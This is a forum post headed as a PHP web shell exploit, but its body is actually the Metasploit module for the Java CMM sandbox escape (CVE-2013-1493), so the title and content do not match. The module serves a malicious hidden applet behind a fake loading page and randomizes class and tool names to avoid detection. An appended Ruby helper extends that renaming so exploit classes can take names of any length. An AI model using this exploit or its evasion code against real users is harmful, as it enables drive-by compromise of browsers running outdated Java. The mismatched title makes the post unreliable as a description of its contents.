STUNSHELL PHP Web Shell Remote Code Execution

Original poster, posted 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # Load the four precompiled applet classes shipped under data/exploits/cve-2013-1493
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # The entry class is renamed with a random string of the SAME length, because the
    # rename is a raw byte substitution on the class file: the constant pool stores
    # each string with a length prefix, so a longer or shorter name would corrupt it.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Wrap the selected payload in a jar and add the exploit classes to it
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Randomize the telltale "metasploit"/"Payload" strings in the jar entry names
      # and contents (again with same-length replacements)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    # 1x1 applet whose archive name is random per request and whose entry class is the
    # renamed Init class
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
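The module above renames its entry class with rand_text_alpha("Init".length), i.e. a random name of exactly the same length, and patches the class bytes with a plain gsub. That only works because the JVM constant pool stores every string as a CONSTANT_Utf8 entry with a two-byte length prefix: a same-length substitution leaves every prefix valid, while a longer or shorter name silently corrupts the class. The following is an added example written for this page, not code from the post or from the Metasploit module, showing the general form of that trick: a constant-pool-aware rename that rewrites the length prefixes so the new name may be any length, plus a well-formedness check that exposes what a naive gsub does. The class file it operates on is constructed inline (a minimal, method-less class named Init) and all function names are my own.

```ruby
require 'stringio'

CLASS_MAGIC    = 0xCAFEBABE
CONSTANT_UTF8  = 1
CONSTANT_CLASS = 7
# Payload size in bytes of every fixed-size constant-pool tag (Utf8 is variable-length).
CP_FIXED_LEN = { 3 => 4, 4 => 4, 5 => 8, 6 => 8, 7 => 2, 8 => 2, 9 => 4, 10 => 4,
                 11 => 4, 12 => 4, 15 => 3, 16 => 2, 17 => 4, 18 => 4, 19 => 2, 20 => 2 }

# Walk the constant pool. Returns [entries, offset_of_rest_of_file]; each entry records
# its slot index, tag, byte offset and length, the decoded string for Utf8 entries and
# the name_index for Class entries. Raises ArgumentError on anything malformed.
def parse_constant_pool(bytes)
  io = StringIO.new(bytes.b)
  header = io.read(10)
  raise ArgumentError, 'truncated header' unless header && header.bytesize == 10
  magic, _minor, _major, count = header.unpack('Nnnn')
  raise ArgumentError, 'not a class file' unless magic == CLASS_MAGIC
  entries = []
  index = 1
  while index < count
    offset = io.pos
    tag = io.read(1).ord
    entry = { index: index, tag: tag, offset: offset }
    if tag == CONSTANT_UTF8
      len = io.read(2).unpack1('n')
      entry[:str] = io.read(len)
    elsif CP_FIXED_LEN.key?(tag)
      data = io.read(CP_FIXED_LEN[tag])
      entry[:name_index] = data.unpack1('n') if tag == CONSTANT_CLASS
    else
      raise ArgumentError, "unknown constant pool tag #{tag} at offset #{offset}"
    end
    entry[:len] = io.pos - offset
    entries << entry
    index += (tag == 5 || tag == 6) ? 2 : 1 # Long and Double occupy two slots
  end
  [entries, io.pos]
end

# Names of all classes referenced through CONSTANT_Class entries, in pool order.
def class_names(bytes)
  entries, _ = parse_constant_pool(bytes)
  by_index = entries.each_with_object({}) { |e, h| h[e[:index]] = e }
  entries.select { |e| e[:tag] == CONSTANT_CLASS }.map { |e| by_index[e[:name_index]][:str] }
end

# Rebuild the class with every Utf8 entry equal to old_name replaced by new_name and its
# length prefix rewritten, so the replacement need not be the same length. Descriptor
# strings that embed the name (e.g. "LInit;") are left alone and would need their own pass.
def rename_class(bytes, old_name, new_name)
  entries, body_offset = parse_constant_pool(bytes)
  out = bytes.byteslice(0, 10).b # header, including the unchanged constant_pool_count
  entries.each do |e|
    if e[:tag] == CONSTANT_UTF8 && e[:str] == old_name
      out << [CONSTANT_UTF8, new_name.bytesize].pack('Cn') << new_name.b
    else
      out << bytes.byteslice(e[:offset], e[:len])
    end
  end
  out << bytes.byteslice(body_offset, bytes.bytesize - body_offset)
end

# True when the constant pool parses cleanly; a naive gsub that changes a string's
# length makes the parser read into the following entry and fail here.
def well_formed?(bytes)
  parse_constant_pool(bytes)
  true
rescue ArgumentError, NoMethodError, TypeError
  false
end

# Constructed sample: a minimal class file (no methods) named `name`, extending Object.
def build_sample_class(name = 'Init')
  utf8 = ->(s) { [CONSTANT_UTF8, s.bytesize].pack('Cn') + s.b }
  cp = [
    utf8.call(name),                  # 1  Utf8 this-class name
    [CONSTANT_CLASS, 1].pack('Cn'),   # 2  Class -> #1
    utf8.call('java/lang/Object'),    # 3
    [CONSTANT_CLASS, 3].pack('Cn'),   # 4  Class -> #3 (super)
    utf8.call('<init>'),              # 5
    utf8.call('()V'),                 # 6
    [12, 5, 6].pack('Cnn'),           # 7  NameAndType <init>:()V
    [10, 4, 7].pack('Cnn')            # 8  Methodref Object.<init>
  ]
  header = [CLASS_MAGIC, 0, 49, cp.size + 1].pack('Nnnn')
  body = [0x0021, 2, 4, 0, 0, 0, 0].pack('n*') # flags, this, super, no ifaces/fields/methods/attrs
  (header + cp.join + body).b
end
```

Run against the constructed class, rename_class('Init' to 'LongerName') still parses and grows the file by the 6 extra name bytes, whereas bytes.gsub('Init', 'LongerName') fails well_formed? because the stale length prefix of 4 leaves "erName" to be read as constant-pool tags. A same-length gsub, which is what the module relies on, keeps the file well formed.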